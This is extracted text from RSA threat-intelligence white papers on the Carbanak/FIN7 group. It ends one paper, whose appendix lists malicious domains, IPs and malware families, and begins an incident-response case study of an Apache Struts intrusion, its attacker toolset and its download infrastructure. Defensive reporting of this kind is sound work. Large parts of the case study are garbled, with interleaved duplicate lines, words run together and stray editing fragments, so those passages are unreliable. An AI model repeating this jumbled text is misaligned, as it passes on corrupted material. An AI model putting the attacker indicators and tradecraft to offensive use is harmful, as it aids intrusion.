tool to be aware of is a Windows native utility,
net.exe.
More comprehensive
frameworks exist in the Recon module for PowerSploit or the Situational
Awareness module for PowerShell Empire.
WHITE PAPER
Proper segmentation of the network could have also prevented the incident
described above. Had the DMZ of the internet-facing web hosts not had
access to the internal network segments, this would not have happened. This
can be taken a step further, segmenting financial data into its own network
with even tighter access controls and visibility. The industrial verticals that
use supervisory control and data acquisition (SCADA) networks to control
machinery running the world (such as power grids) use this methodology to
reduce their attack surface. If a corporate user is spear phished and a Trojan
is installed, it should be physically impossible to access these resources. The
same approach in storing and handling financial data should also be taken.
Prevention is preferred, but in the modern threat environment, a security
analyst must assume a breach is in progress and scrutinize the network
accordingly. Active hunting in network traffic and endpoint behavior and
artifacts should be a daily task. Apex predators in nature have finely tuned
senses to hunt their prey; so should the modern security analyst.
With the right people, process and technology, organizations should be
able to detect these Trojans and movement throughout the network, with
ease. If an organization is using the RSA NetWitness Suite, the parsers,
methodologies and YARA signatures described in this paper offer wide
coverage for this actor. While persistent, they have proven to not be
advanced, using tools and tactics available to every level of penetration
tester. That they are even successful and worth mentioning should
tell us that, as an industry, we
re still undergoing growing pains. With
technological advancements coming at full speed, we need to be flexible in
our understanding of the
what
and
re defending. We also need
to be flexible in our understanding of the threats themselves, not make
assumptions. No organization has the perfect security instrumentation and
processes; it
s an ongoing cycle.
7. CONCLUSIONS
The Carbanak/FIN7 syndicate has had an interesting history over the past fourplus years of observation. The syndicate began targeting Russian and European
banking institutions, employing mules to run money from ATMs and direct
transfers to bank accounts. When the first report emerged in 2015 and following
the subsequent high-profile arrests, the group appeared to slow down and
fragment into smaller sub-groups, possibly because members were arrested.
The syndicate then appeared to return in force in 2016 with a diversified
digital arsenal and target deck. Since reappearing, they have been observed in
the financial, hospitality, retail, food service and other industrial verticals with
easy access to financial data.
Carbanak uses disclosed vulnerabilities in email exploits/lures, as well as
direct attacks on infrastructure exposed to the internet, to gain an initial
WHITE PAPER
foothold. Once on a victim network, they possess an arsenal of postexploitation tools, allowing them to escalate privileges, proxy internally to
firewalled segments, move laterally, conduct reconnaissance, and surveil
individuals for information on the financial data systems. They are motivated
and extremely persistent.
APPENDIX
Warning: The following table includes content some may find offensive.
The data contained in this table is necessary for the proper protection of
enterprises against this actor.
Rd Domain
Malware
Involved
Links to Anunak
zaydo.website
zaydo.space
zaydo.co
akkso-dob.in
upatre
downloader
nikaka-ost.in
skaoow-loyal.xyz
akkso-dob.xyz
upatre
downloader
maorkkk-grot.xyz
upatre
downloader
skaoow-loyal.net
nikaka-ost.xyz
upatre
downloader
pasteronixca.com
corebot
pasteronixus.com
corebot
vincenzo-bardelli.com
corebot
marcello-bascioni.com
corebot
namorushinoshi.com
corebot
chugumshimusona.com
corebot
wascodogamel.com
corebot
ppc-club.org
corebot
Resolved between
09/16/2015
01/08/2016 to
91.194.254.207 same subnet
as advetureseller.com and
others
WHITE PAPER
castello-casta.com
carberp
cameron-archibald.com
carberp
narko-cartel.com
andromeda
narko-dispanser.com
andromeda
dragonn-force.com
Resolved between
02/04/2015
05/14/2016 to
91.194.254.207 same subnet
as advetureseller.com and
others
my-amateur-gals.com
gooip-kumar.com
badur
Resolved between
02/05/2015
04/17/2015 to
91.194.254.207 same subnet
as advetureseller.com and
others
casas-curckos.com
levetas-marin.com
badur
casting-cortell.com
ass-pussy-fucking.net
02/08/2015
04/29/2016,
91.194.254.207 same subnet
as advetureseller.com and
others
brazilian-love.org
baltazar-btc.com
road-to-dominikana.biz
corebot
ihave5kbtc.org
andromeda
ihave5kbtc.biz
andromeda
critical-damage333.org
Table 2: Links to Anunak/Sekur Malware
WHITE PAPER
CONTENT AND LIABILITY DISCLAIMER This Research Paper is for general information purposes
only, and should not be used as a substitute for consultation with professional advisors. RSA
Security LLC, EMC Corporation, Dell, Inc. and their affiliates (collectively,
) have exercised
reasonable care in the collecting, processing, and reporting of this information but have not
independently verified, validated, or audited the data to verify the accuracy or completeness
of the information. RSA shall not be responsible for any errors or omissions contained in this
Research Paper, and reserves the right to make changes anytime without notice. Mention of
non-RSA products or services is provided for informational purposes only and constitutes neither
an endorsement nor a recommendation by RSA. All RSA and third-party information provided
in this Research Paper is provided on an
as is
basis. RSA DISCLAIMS ALL WARRANTIES,
EXPRESSED OR IMPLIED, WITH REGARD TO ANY INFORMATION (INCLUDING ANY
SOFTWARE, PRODUCTS, OR SERVICES) PROVIDED IN THIS RESEARCH PAPER, INCLUDING
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE, AND NON-INFRINGEMENT. Some jurisdictions do not allow the exclusion of implied
warranties, so the above exclusion may not apply to you. In no event shall RSA be liable for
any damages whatsoever, and in particular RSA shall not be liable for direct, special, indirect,
consequential, or incidental damages, or damages for lost profits, loss of revenue or loss of use,
cost of replacement goods, loss or damage to data arising out of the use or inability to use any RSA
website, any RSA product or service. This includes damages arising from use of or in reliance on
the documents or information present in this Research Paper, even if RSA has been advised of the
possibility of such damages.
RSA and the RSA logo, are registered trademarks or trademarks of Dell Technologies in
the United States and other countries.
Copyright 2017 Dell Technologies. All rights reserved.
Published in the USA. 10/17 White Paper H16817.
RSA believes the information in this document is accurate as of its publication date.
The information is subject to change without notice.
WHITE PAPER
THE SHADOWS OF GHOSTS
INSIDE THE RESPONSE OF A UNIQUE
CARBANAK INTRUSION
BY: JACK WESLEY RILEY
PRINCIPAL INCIDENT RESPONSE CONSULTANT
WHITE PAPER
TABLE OF CONTENTS
1 GLOSSARY OF TERMS.......................................................................................... 1
2 REPORT SUMMARY.............................................................................................. 2
3 INTRUSION OVERVIEW....................................................................................... 7
3.1 ANATOMY OF ATTACK............................................................................................. 7
3.1.1 Phase 1: D+0............................................................................................................ 8
3.1.2 Phase 2: D+0............................................................................................................ 8
3.1.3 Phase 3: D+1 through D+3................................................................................... 9
3.1.4 Phase 4: D+3 through D+25.............................................................................. 11
3.1.5 Phase 5: D+25 through D+30........................................................................... 12
3.1.6 Phase 6: D+30 through D+44........................................................................... 13
3.2 DETECTION AND RESPONSE.............................................................................. 14
4 INTRUSION DETAILS.......................................................................................... 17
4.1 INITIAL COMPROMISE: APACHE STRUTS2................................................... 17
4.2 LINUX COMPROMISE AND MALICIOUS FILES............................................ 17
4.2.1 Dirty Cow Driver Script and Kre80r Proof of
Concept Code.................................................................................................................. 17
4.2.2 SSHDoor Client and Server................................................................................ 20
4.2.3 AudiTunnel............................................................................................................ 22
4.3 LINUX SECONDARY ATTACKER TOOLS................................................... 23
4.3.1 Winexe.................................................................................................................... 23
4.3.2 ALW (Advanced Log Wiper,
)......................................................................... 24
4.3.3 PSCAN..................................................................................................................... 25
4.4 WINDOWS COMPROMISE AND MALICIOUS FILES............................. 26
4.4.1 GOTROJ Remote Access Trojan........................................................................ 26
4.4.2 AudiTunnel (Windows Version)......................................................................... 29
4.5 WINDOWS SECONDARY ATTACKER TOOLS.......................................... 30
4.5.1 TINYP....................................................................................................................... 30
4.5.2 WGET (UIAutomationCore.dll.bin)................................................................... 32
4.5.3 PSCP (PuTTY Secure File Copy)......................................................................... 33
4.5.4 Mimikatz Variant (32-bit, 64-bit)..................................................................... 33
4.5.5 CCS........................................................................................................................... 34
4.5.6 Infos.bmp................................................................................................................ 34
4.5.7 PSCAN (Windows Version)................................................................................. 35
4.6 DETECTION, TRACKING, AND RESPONSE.............................................. 35
4.6.1 Network Visibility and Indicators..................................................................... 36
4.6.2 Host Visibility and Indicators............................................................................. 42
5 CONCLUSION...................................................................................................... 52
6 INDICATORS OF COMPROMISE..................................................................... 54
6.1 ATOMIC INDICATORS OF COMPROMISE........................................................ 54
6.2 BEHAVIORAL INDICATORS OF COMPROMISE.............................................. 55
7 DIGITAL APPENDIX............................................................................................ 56
WHITE PAPER
INDEX OF FIGURES
Figure 1: Findings from Public and Open Source
Research of Toolset Reference......................................................................................... 3
Figure 2: Staged Overview of Engagement.................................................................. 7
Figure 3: Perl Script Download from 95.215.46.116................................................ 8
Figure 4: Metadata Showing
Output, Actions,
and Port Usage in IRC Traffic............................................................................................. 9
Figure 5: Download of CVE-2016-5195 Exploit Code
and Bash Script Driver.......................................................................................................... 9
Figure 6: Download of Winexe via WGET to ALPHA............................................. 11
Figure 7: Download of ALW and PSCAN from 95.215.46.116............................ 12
Figure 8: AUDITUNNEL Download from 95.215.46.116...................................... 13
Figure 9: Windows Toolset Download of WGET,
TINYP, INFOS, CCS, MIMIKATZ, PSCP, and PSCAN............................................... 14
Figure 10: Initial Finding of GOTROJ Communications
with Suspect Meta............................................................................................................... 15
Figure 11: Initial Finding of TINYP Lateral Movement.......................................... 15
Figure 12: Contents of
1.sh
Dirty COW Shell Script............................................. 18
Figure 13: Contents of
Dirty COW Source Code.......................................... 19
Figure 14: Observed Download of 1.sh and c0w from
IP 185.61.148.145............................................................................................................... 19
Figure 15: WGET Download of SSHDoor Binary ssh.............................................. 19
Figure 16: RC4 Decrypted authorized_keys Entry
and HTTP Format Strings................................................................................................. 20
Figure 17: Credential Harvesting HTTP Request.................................................... 21
Figure 18: Pre-Shared SSH Key Used by SSHDOOR.............................................. 21
Figure 19: XOR 0x41 Traffic for AudiTunnel............................................................. 22
Figure 20: Usage Message for WINEXE Binary........................................................ 24
Figure 21: Usage Message for l Advanced Log Wiper............................................ 25
Figure 22: Usage Message for PSCAN Port Scanning Tool................................... 26
Figure 23: Example Usage of PSCAN Port Scanning Tool..................................... 26
Figure 24: XOR Command Decryption Method....................................................... 27
Figure 25: Annotated Encrypted Form of
GOTROJ Communication................................................................................................. 28
Figure 26: Annotated Decrypted Form of
GOTROJ Communication................................................................................................. 28
Figure 27: C2 IP Address in ASCII Strings of svcmd.exe........................................ 29
WHITE PAPER
Figure 28: XOR Byte Encryption Loop for Send and
Receive Buffer...................................................................................................................... 30
Figure 29: Sample Execution of TINYP v.0.7.7.4...................................................... 32
Figure 30: WGET Renamed to UIAutomationCore.dll.bin................................... 33
Figure 31: Download of TINYP Binary with
UIAutomationCore.dll.bin................................................................................................ 33
Figure 32: Example Execution and Usage Text of Windows
Version of PSCAN................................................................................................................ 35
Figure 33: Query Results for Malicious Tool Downloads...................................... 37
Figure 34: Tunneled SSH Query Results..................................................................... 38
Figure 35: AUDITUNNEL
Client Hello
Payload Detection and Meta............. 39
Figure 36: GOTROJ Binary Control Traffic and svcmd.exe Beacon Traffic..... 40
Figure 37: Identification of Windows Command Prompt in
XOR 0xC0 Decrypted Payload........................................................................................ 40
Figure 38: GOTROJ Beacon Meta From Digital Appendix Content................. 41
Figure 39: Identification of GOTROJ HTTP #wget User-Agent......................... 41
Figure 40: File Hash Mismatch and system/init.d Autostart
in SSHDOOR Detection.................................................................................................... 43
Figure 41: Malicious Binary Usage in Non-Standard Locations
and Without Associated Packages................................................................................ 43
Figure 42: IP Address, Port Switch, and Port Number in
Program Arguments........................................................................................................... 44
Figure 43: NetWitness Endpoint Request for All Files in
Directory /usr/share/man/mann.................................................................................... 44
Figure 44: Additional Findings via Mass File Download
Request for Directory /usr/share/man/mann........................................................... 45
Figure 45: C:\Windows\SysWOW64\zh-TW Working Directory,
UIAutomationCore WGET Usage, and TINYP Download and Renaming.......... 46
Figure 46: Instant IOCs Representing UIAutomationCore.dll.bin
WGET Binary Activity....................................................................................................... 46
Figure 47: TINYP Execution from Source (Red) and
Target (Blue) Perspective................................................................................................. 47
Figure 48: TINYP vs PSEXEC Service Binaries......................................................... 48
Figure 49: TINYP vs PSEXEC
Module Differences.............................................. 48
Figure 50: cmd.exe Calling find.exe as a Piped Directory Listing Search........ 50
Figure 51: qwinsta.exe Being Called by cmd.exe...................................................... 50
Figure 52: Installation of GOTROJ RAT Via Windows Service........................... 51
WHITE PAPER
Figure 53: Deletion of GOTROJ Windows Service After Execution................. 51
Figure 54: GOTROJ Process Executing and
Network Connection Information................................................................................. 51
Figure 55: C2 IP and Port Identification in Cursory Analysis via
Endpoint Module Analyzer............................................................................................... 51
INDEX OF TABLES
Table 1: File Information for the SSHDOOR Client Binary
(centos-repo.org)................................................................................................................. 21
Table 2: File Information for the SSHDOOR Server Binary
(centos-repo.org)................................................................................................................. 21
Table 3: File Information for SSHDOOR Client Binary (slpar.org)..................... 22
Table 4: File Information for SSHDOOR Server Binary (slpar.org).................... 22
Table 5: File Information for AUDITUNNEL.............................................................. 23
Table 6: File Information for WINEXE......................................................................... 24
Table 7: Logs Modified by ALW Log Wiper.................................................................. 25
Table 8: File Information for ALW.................................................................................. 25
Table 9: File Information for PSCAN............................................................................ 26
Table 10: Decoded Commands for GOTROJ Trojan............................................... 27
Table 11: File Information for GOTROJ Version 1.................................................. 29
Table 12: File Information for GOTROJ Version 2.................................................. 29
Table 13: File Information for GOTROJ Version 3.................................................. 29
Table 14: File Information for AUDITUNNEL (Windows Version).................... 30
Table 15: TINYP Arguments and Functions............................................................... 31
Table 16: File Information for TINYP v.0.7.6.2.......................................................... 32
Table 17: File Information for TINYP v.0.7.7.4.......................................................... 32
Table 18: File Information for WGET (UIAutomationCore.dll.bin).................... 33
Table 19: File Information for PSCP.............................................................................. 33
Table 20: File Information for MIMIKATZ Variant (32-bit).................................. 34
Table 21: File Information for MIMIKATZ Variant (64-bit).................................. 34
Table 22: File Information for CCS................................................................................ 34
Table 23: File Information for INFOS........................................................................... 34
Table 24: File Information for PSCAN (Windows Version)................................... 35
Table 25: List of Commands Internal to the
Windows Command Processor...................................................................................... 49
Table 26: Cross-Platform Toolset Utilization............................................................ 52
WHITE PAPER
1. GLOSSARY OF TERMS
Actions-on-objective: Command execution, file interaction and other
actions an attacker may take when interacting with compromised systems.
Lateral movement: The movement of a user session to a system within the
network boundaries of an organization from a system also present within
the same network boundary.
Internal reconnaissance: Obtaining initial or additional information about
systems, users, login methods and network paths of systems internal to an
organization
s network.
Credential Harvesting: The acquisition and collection of initial or additional
user account credentials for use in lateral movement.
Security event: An asset or system action, or communication, that diverges
from regular operational activity in a way that the security posture of that
asset becomes suspect.
Security incident: A security event or group of security events that have
been confirmed, either singularly or in aggregate, as being malicious in intent.
Compromise: Unauthorized, unforeseen or unknown actions conducted on
an informational asset that allows for direct and unauthorized access
and interaction.
Intrusion: The direct and unauthorized access and interaction of a malicious
actor with systems or assets internal to an organization
s network.
Staging: The actions involved in occupying and preparing an internal
system or asset to secure additional resources and ensure persistence of
attacker ingress access.
Declaration: The point in time in which an organization confirms the
presence of an attacker in an environment and initiates incident
response procedures.
Indicator of Compromise (IOC): A behavior, pattern, network address,
computed file hash or other system or network attribute that can be
correlated to malicious activity.
WHITE PAPER
2. REPORT SUMMARY
This report shares actionable threat intelligence and proven threat hunting
and incident response methods used by the RSA Incident Response (IR) Team
to successfully respond to an intrusion in early-to-mid 2017 by the threat
actor group known as CARBANAK1, also known as FIN7. The methodology
discussed in this report is designed, and has been tested, to be effective
on several currently available security technologies. While the majority of
examples shown in this document use the RSA NetWitness
Suite in their
illustrations, the methodology, query logic, and behavioral indicators discussed
can be used effectively with any security product providing the necessary
visibility. The intrusion and response described in this paper highlight
key behavioral tactics, techniques, and procedures (TTP) unique to this
engagement, giving significant insight into the thought processes, preparation,
and adaptive nature of actors within the CARBANAK threat actor group. This
paper also illustrates the RSA Incident Response Team
s Incident Response
and Threat Hunting Methodology: an unorthodox, adaptive and highly
effective methodology used to successfully detect, investigate, scope, track,
contain, and ultimately expel these and many other advanced adversaries.
Several intrusions associated with the CARBANAK actors have been reported
within the last year, describing compromises of organizations within banking2,
financial3, hospitality4, and restaurant verticals. However, they all describe a
relatively equivalent progression, with only slight deviation in specific attacker
actions. The intelligence surrounding recent CARBANAK incidents indicate that
phishing attacks have been the group
s primary method of initial compromise.
After gaining access to a user system, the attackers move laterally throughout
the environment, conduct internal reconnaissance, establish staging points and
internal network paths, harvest credentials, and move towards their intended
target. However, this intrusion began with a significantly higher level of privilege
due to the exploitation of the Apache Struts vulnerability CVE-2017-5638 that
allowed the attackers to quickly gain administrative access within the client
Linux environment. The intrusion outlined in this report discusses a case that
presented substantial challenges due to:
Krebs;
Krebs on Security
Posts Tagged: Carbanak
; https://krebsonsecurity.com/tag/carbanak/
Schwartz;
Sophisticated Carbanak Banking Malware Returns, With Upgrades
https://www.bankinfosecurity.com/sophisticated-carbanak-banking-malware-returnsupgrades-a-8523
Krebs;
Payments Giant Verifone Investigating Breach
https://krebsonsecurity.com/2017/03/payments-giant-verifone-investigating-breach/
Krebs;
Hyatt Hotels Suffers 2nd Card Breach in 2 Years
https://krebsonsecurity.com/2017/10/hyatt-hotels-suffers-2nd-card-breach-in-2-years/
Miller, Nuce, Vengerik;
FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings
https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html
WHITE PAPER
The initial intrusion vector
Unique attacker toolset
The attacker dwell time
The large, heterogeneous environment
The speed with which the attackers gained administrative access
The forensic mindfulness of the CARBANAK attackers
The toolset utilized by the attackers was a mix of custom
! tools, freely
The!Shadows!of!Ghosts!
! researched
Case!Study:!CARBANAK!
available code, and open source software utilities. RSA IR
all 32 of
the malicious files in the CARBANAK toolset using various publicly available
andutilized
open source
Six of
used tools,
in thisfreely
intrusion
werecode
found
The toolset
by theresources.
attackers was
a the
mix tools
of custom
available
and open
source software
utilities.
researched
malicious
files
CARBANAK
to have been uploaded to a publicly available antivirus aggregation site. Of
toolset using various publicly available and open source resources. Six of the tools used in this
fivetoofhave
thembeen
haveuploaded
little to no
or indication
of malice
from site. Of
intrusionthese
weresix,
found
to detection
a publicly available
antivirus
aggregation
these six,
five of them
haveThis
little
to no detection
or indication
of malice
from
antivirus vendors.
antivirus
vendors.
observation
explains
the reason
that the
client
This observation
explainshost
the reason
that mechanisms
the client
s signature-based
protection
signature-based
protection
were unable tohost
identify
mechanisms were unable to identify or prevent the use of these tools.
prevent the use of these tools.
Figure
1:1:
Findings
from
Researchof
ofToolset
ToolsetReference
Reference
Figure
Findings
fromPublic
Publicand
andOpen
Open Source
Source Research
While the
attackers
used more
than
30 unique
malware
and tools,and
they
also
While
the attackers
used
more
than 30samples
unique of
samples
of malware
tools,
demonstrated a normalization across Windows and Linux with respect to their toolset. The
demonstrated
a normalization
across
Windows
and Linux with
toolsets they
they also
deployed
can be broken
down into five
basic
functionalities:
respect to their toolset. The toolsets they deployed can be broken down into
Ingress/Egress/Remote
Access
five basic functionalities:
Lateral Movement
Cleanup
Ingress/Egress/Remote
Access
Credential Harvesting
Lateral
Movement
Internal
Reconnaissance
Log
Cleanup this distinct functionality in their toolsets, they normalized functions
In addition
to following
across different operating system environments in the forms of the two versions of
Credential Harvesting
AUDITUNNEL, PSCAN, and the use of WINEXE (Linux) and TINYP (Windows). This
normalization
of tools
is discussed in more detail later in this paper, but it identifies that not only
Internal
Reconnaissance
do CARBANAK actors have the capability to successfully compromise various operating system
environments, they have actually standardized and operationalized this capability. This attribute
indicates strategic operational thought and effort being invested in this group
s compromises,
Page 7
WHITE PAPER
In addition to following this distinct functionality in their toolsets, they
normalized functions across different operating system environments in the
forms of the two versions of AUDITUNNEL, PSCAN, and the use of WINEXE
(Linux) and TINYP (Windows). This normalization of tools is discussed in more
detail later in this paper, but it identifies that not only do CARBANAK actors
have the capability to successfully compromise various operating system
environments, they have actually standardized and operationalized this
capability. This attribute indicates strategic operational thought and effort
being invested in this group
s compromises, suggesting that the CARBANAK
actors are working towards becoming a more organized, structured,
resourceful and mature threat group.
During an intrusion, time is the single most critical resource to an
organization
s security team and is the most significant indicator of
determining if the security team will be successful in containing, eradicating
and remediating the extant threat. There are two specific sets of time related
to an intrusion that may determine the difference between success and
failure: the time that the attackers are in the environment prior to detection
(dwell time) and the time it takes security teams to identify, investigate,
understand, and contain the attackers
actions (response time). In this specific
incident, the attackers
dwell time at intrusion declaration was 35 days,
which is a significant amount of time given the level of access immediately
available upon compromise. However, by utilizing the methodology and
visibility described in this report, RSA IR was able to complete containment,
eradication, and remediation in only nine days. Further below we discuss the
methodology used by RSA IR to successfully detect, investigate, understand,
and contain the attackers before the actors could achieve their intended goal.
A significant number of organizations focus on majority systems software,
such as Microsoft Windows, for the predominant amount of their visibility.
This often leaves minority systems with very little visibility, protections, or
investigative observational points. Additionally, these minority systems, Linux
being the most significant example, often operate key public-facing or critical
data-based services. Not planning for visibility to ensure minority systems
are included in threat hunting, vulnerability assessments, network data
captures and forensic investigations leads to a false sense of organizational
security and ensures that attackers retain a refuge of critical systems inside
environments. The incident discussed in this report illustrates the dangers
present within this approach once attackers begin utilizing these systems
against organizations. In this report, we discuss the ways the CARBANAK
actors utilized these systems and the methodology used by RSA IR to
successfully respond to this threat.
It highlights the progression of analysis from threat hunting and initial
detection to root cause analysis, incident scoping and follow-on investigation.
The majority of the analysis conducted during this engagement was
WHITE PAPER
performed using RSA
s flagship product, RSA NetWitness Suite. During this
investigation, RSA IR utilized RSA NetWitness Logs and Packets (formerly
RSA Security Analytics) for network visibility and RSA NetWitness Endpoint
(formerly RSA ECAT) for endpoint visibility. These marquee technologies
allow RSA IR and client analysts to process massive data sets, find forensically
interesting artifacts in near real time and do both more quickly than utilizing
standard incident response and forensic procedures. The purpose of this
report is to share actionable threat intelligence associated with a persistent
adversary, discuss the RSA Incident Response Team
s Threat Hunting and
Response Methodology in practice, and illustrate the use of this methodology
as used by RSA IR analysts during a live intrusion. To that end, the Threat
Hunting methodology, examples of detected activity and Incident Response
procedures illustrated in this report have been described in a manner that
can be effectively implemented by any security technology that affords
the analyst the necessary visibility. RSA IR also includes a Digital Appendix
containing file hashes, domain and IP addresses, and detection content for
both RSA NetWitness Endpoint and RSA NetWitness Logs and Packets. While
the detection content has been written specifically for the RSA NetWitness
Suite, each parser and query contains detailed descriptions of their detection
mechanisms for implementation into any available toolset with appropriate
visibility. The hope is that by publishing this report, RSA IR encourages and
empowers operational analysts to utilize Threat Hunting and the RSA IR
Methodology within their own environments.
The CARBANAK actors are financially motivated, advanced actors that have
historically targeted financial and hospitality laterals, with a recent move
into targeting restaurants.6 This threat actor group has shown themselves
to be proficient and careful in their toolset utilization, consistently
removing evidence of any actions-on-objective as they proceed through
an environment. They have been observed utilizing various malware,
methods and communications, with tools and techniques often differing
greatly between targets. While this group has shown technical ingenuity in
techniques such as point-of-sale implants,7 Google services command-andcontrol communications8 and persistence via application shim databases9,
they have also shown a propensity for using freely available or open source
Mesa, Huss;
FIN7/CARBANAK Threat Actor Unleashes Bateleur Jscript Backdoor
https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashesbateleur-jscript-backdoor
KYaneza;
Signed PoS Malware Used in Pre-Holiday Attacks, Linked to Targeted Attacks
http://blog.trendmicro.com/trendlabs-security-intelligence/signed-pos-malware-used-in-preholiday-attacks-linked-to-targeted-attacks/
Griffin;
CARBANAK Group Uses Google for Malware Command-and-Control
https://blogs.forcepoint.com/security-labs/carbanak-group-uses-google-malware-commandand-control
Erikson, McWhirt, Palombo;
To SDB, or Not to SDB: FIN7 Leveraging Shim Databases for Persistence
https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
WHITE PAPER
toolsets for much of their lateral activities. Whatever the methods used,
CARBANAK has shown themselves to be highly persistent and determined
actors, able to rapidly compromise and traverse various environments while
quickly adapting to internal security controls.
This white paper covers a sampling of observed indicators derived and utilized
during this engagement. Included are the details regarding the observed
intrusion vector, entrenchment techniques, actions-on-objective, lateral
movement tools and methods, unique malicious files, and behavioral indicators
utilized in the identification, tracking and response of this actor group.
Included with the publication of this report is a Digital Appendix, containing
content for RSA NetWitness Logs and Packets and RSA NetWitness Endpoint
used to identify and track attacker activity throughout the environment during
this incident. All content should be tested before full integration into RSA
NetWitness Endpoint, RSA NetWitness Logs and Packets or third-party tools
to prevent any adverse effects from unknown environmental variables. More
information on the associated Digital Appendix is found in Section 7.
Disclaimer: This white paper and related graphics are provided for informational and/or educational
purposes. The information contained in this document is intended only as general guidance and is
not legal advice. Although the greatest care has been taken in the preparation and compilation of this
white paper, RSA, its servants and/or agents will accept no liability or responsibility of any kind. This
white paper is not intended to be a substitute for legal or other professional advice, and constitutes the
opinions of the author(s). All information gathered is believed correct as of October 2017. Corrections
should be sent to RSA for future editions. Redistribution or reproduction of this document is prohibited
without written permission of RSA.
WHITE PAPER
3. INTRUSION OVERVIEW
3.1 ANATOMY OF ATTACK
In researching this white paper, the majority of intelligence and incident
reports reviewed described phishing and malicious document-related tactics
The!Shadows!of!Ghosts!
being utilized by CARBANAK actors as a method of initial
compromise.
Case!Study:!CARBANAK!
However, the initial method of compromise observed! during this engagement
3! Intrusion
Overview
utilized the Apache
Struts Content-Type arbitrary command execution
vulnerability, CVE-2017-5638.10 This vulnerability has since been patched
3.1! Anatomy of Attack
by the Apache Software Foundation, and the recommended remediation
In researching this white paper, the majority of
intelligence and incident reports reviewed
process
is available
on their
website.11 While
thebeing
time-tested
method
of actors
described
phishing
and malicious
document-related
tactics
utilized by
CARBANAK
as acompromising
method of initialthe
compromise.
However,
initial
method
compromise
observed
during
user base as the initial ingress method is still very effective,
this engagement utilized the Apache Struts content-type arbitrary command execution
10 commonly give attackers a significant escalation
server-level
compromises
vulnerability,
CVE-2017-5638.
This vulnerability has since been patched by the Apache
Software
Foundation,
recommended
remediation
process
is available
on their and
website.11
in initial privilege, as well as a shorter
path between
initial
compromise
While the time-tested method of compromising the user base as the initial ingress method is still
data. Thiscompromises
allows themcommonly
greater give
rights
and versatility
upon
initial in
veryend-target
effective, server-level
attackers
a significant
escalation
initial
privilege,
well
shorter
path
between
initial
compromise
end-target
data. This
compromise while making it harder for defenders to stop them on the initially
allows them greater rights and versatility upon initial compromise while making it harder for
compromised
system.
anatomy
of the engagement,
brokenofinto
defenders
to stop them
on theAn
initially
compromised
system. An anatomy
the engagement,
broken
into
primary
stages,
illustrated
Figure
primary stages, is illustrated in Figure 2.
Delete
Delete
Comm
entry:
bin/cv
Forma
Delete
Delete
Delete
Comm
the sty
short,
submi
Comm
brande
team c
busine
Figure 2: Staged Overview of Engagement
Upon determining that the initially compromised web server, designated as
system ALPHA,
was and
vulnerable
to CVE-2017-5638,
the rest of the attacker
Common
Vulnerabilities
Exposures
https://cve.mitre.org/cgibin/cvename.cgi?name=CVE-2017-5638
actions
could
grouped
into
eight
stages
illustrated
in Figure 2. These
Apache Struts Documentation: S2-046
; https://struts.apache.org/docs/s2-046.html
phases are described further in the remainder of Section 3. All binaries, withPage 10
the exception of the
Perl script, are described in detail in Section 4.
Common Vulnerabilities and Exposures
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638
Apache Struts Documentation: S2-046
; https://struts.apache.org/docs/s2-046.html
WHITE PAPER
The!Shadows!of!Ghosts!
Case!Study:!CARBANAK!
Figure 2: Staged Overview of Engagement
Upon determining that the initially compromised web server, designated as system ALPHA, was
3.1.1 Phase
1: D+0
vulnerable
to CVE-2017-5638,
the rest of the attacker actions could be grouped into the eight
stages illustrated in Figure 2. These phases are described further in the remainder of Section 3.
Initial Compromise, Initial Code Execution
All binaries, with the exception of the
Perl script, are described in detail in Section 4.
Attackers
from
3.1.1!
Phase 1:
D+0IP 185.117.88.97 utilize CVE-2017-5638 to download
andCompromise,
execute a Perl
script
ALPHA. The Perl script was downloaded via
Initial
Initial
Codeon
Execution
WGET from IP 95.215.45.116. This action constitutes the moment of initial
Attackers from IP 185.117.88.97 utilize CVE-2017-5638 to download and execute a Perl
compromise
referenced
in this document
as from
All95.215.45.116.
other times This
script
on ALPHA.and
The is
Perl
script was downloaded
via WGET
action
constitutes
the report
momentwill
of initial
compromise
document
discussed
in this
use this
moment
asisa referenced
referenceininthis
their
notation,
All other times discussed in this report will use this moment as a reference in their notation,
such
refers
twoafter
days
after
initial compromise.
metadata
such
thatthat
refers
to twoto
days
initial
compromise.
The metadata
created
by RSA
NetWitness Suite describing this action is shown in Figure 3.
created by RSA NetWitness Suite describing this action is shown in Figure 3.
Delete
Delete
Delete
Delete
Delete
FigureFigure
3: Perl
Script
Download
95.215.46.116
3: Perl
Script
Downloadfrom
from 95.215.46.116
3.1.2!
Phase
2: D+0
3.1.2
Phase
2: D+0
Internal Reconnaissance, Privilege Escalation, Persistence
Internal Reconnaissance, Privilege Escalation, Persistence
Six minutes after the download and execution of the Perl script, system ALPHA began
Six minutes after the download and execution of the Perl script, system
communicating with IP address 95.215.46.116 via IRC. While the available full packet capture
ALPHA
communicating
IP address
95.215.46.116
IRC.was
While
retention
didbegan
not extend
to this date atwith
the time
of analysis,
the metadata via
created
still
available. While RSA was unable to review the raw data to determine actions taken, RSA IR was
the available full packet capture retention did not extend to this date at the
able to determine traffic type, as well as infer the intention of the nature of actions taken via this
channel.
It analysis,
appeared that
IRC communication
a method
of remote
time of
the this
metadata
created was
still
available.
Whilecommand
RSA wasexecution
conducted by the attackers, evidenced by the presence of an output from the
User Activity
unable to review the raw data to determine actions taken, RSA IR was able to
Linux binary. This is illustrated in Figure 4.
determine traffic type, as well as infer the intention of the nature of actions
taken via this channel. It appeared that this IRC communication was a method
Page 11
of remote command execution conducted by the attackers, evidenced by
the presence of an output from the
User Activity Linux binary. This is
illustrated in Figure 4.
Delete
Delete
Delete
Delete
WHITE PAPER
The!Shadows!of!Ghos
Case!Study:!CARBANA
Figure
4: 4:
Metadata
Showing
Output,
Actions
andand
PortPort
Usage
in IRC
Traffic
Figure
Metadata
Showing
Output,
Actions
Usage
in IRC
Traffic
While the attackers attempted to use the
sudo
administrative privilege
While thebinary
attackers
attempted
to use
the
sudo
administrative
privilege
binary to gain root
to gain
root access,
the privilege-separation
user the
web server
access, the privilege-separation user the web server was running as did not have the necessary
was running as did not have the necessary permission. In response to this,
permission. In response to this, the attackers downloaded a copy of C source Proof of Concept
thewritten
attackers
copy ofthe
C source
